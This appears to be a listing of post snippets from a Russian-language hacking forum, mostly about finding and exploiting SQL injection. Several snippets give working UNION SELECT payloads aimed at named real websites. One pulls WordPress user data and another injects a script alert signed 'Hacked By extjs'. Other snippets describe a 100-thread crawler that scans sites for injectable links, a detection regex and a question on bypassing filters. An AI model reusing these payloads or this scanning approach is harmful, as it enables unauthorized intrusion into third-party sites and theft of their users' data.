Separate names with a comma.
https://gist.github.com/tz4678/f417a5f4dbf647ed5fc346f1ad3895ff Если найдете какие ошибки, пишите в комментариях к гисту. Пример использования:...
Скрипт для консоли для раскрутки инъекции на текущей странице: https://gist.github.com/tz4678/9f0e3b5a4cc8bc4dbe3721e341b51bf2 [IMG]
Например, хочу в cmd набирать python2 и чтобы запускался второй питон (C:\Python27\). Третий уже установлен, кроме переименования экзешника есть...
http://an-tarusa.ru/View.aspx?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 все равно не знаю, что с этим Jet Database делать
Это класс БД: class DB { protected $dbname; protected $user; protected $password; protected $host; protected $port; protected...
view-source:http://www.nesprosta.ru/?type=content&id=29' <!--SELECT * FROM structure WHERE id like '29''<br>Ошибка БД: You have an error in your...
Вот этой функцией заменяю фрагменты url на *, а звездочку потом на кавычку def inject(url): scheme, netloc, path, query, fragment =...
http://mobile-phone-buy.ru/buy_mobile.php?pc=DOOGEE-T5%27+union+all+select+%27%3E%3Cscript%3Ealert("Hacked By extjs")%3C/script%3E%27--+...
http://www.ratsp.ru/organization/contacts%27 сейчас сканнер работает по сл принципу: краулер заходит на главную сайта, собирает с нее сылки, а...
Вообщем, по-ходу то что я хочу никак и не сделать. Поэтому сканнер останется в таком виде: import argparse import logging import queue import re...
Набросок на javascript (реализовать можно на любом языке) var test_urls = new Set() // получаем все ссылки на странице var urls =...
Регулярка для поиска инъекций на странице. Может кому пригодится: r'mysqli?_fetch\w+\(\)|You have an error in your SQL syntax|DB query error' DB...
Вообщем, появилась такая идея. Сначала я ее реализовал в лоб. Написал краулера на питоне, который в 100 потоков ходит по ссылкам на сайте и...
view-source:http://mstream.fr/webtv/film.php?id=-1+union+select+1,2,@,4,5,6,7,8,9,10,11+from(select+@:=0x00,(select+@+from+wp_users+where+@:=concat...
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23 Как обойти фильтрацию? Дело в том, что если значение...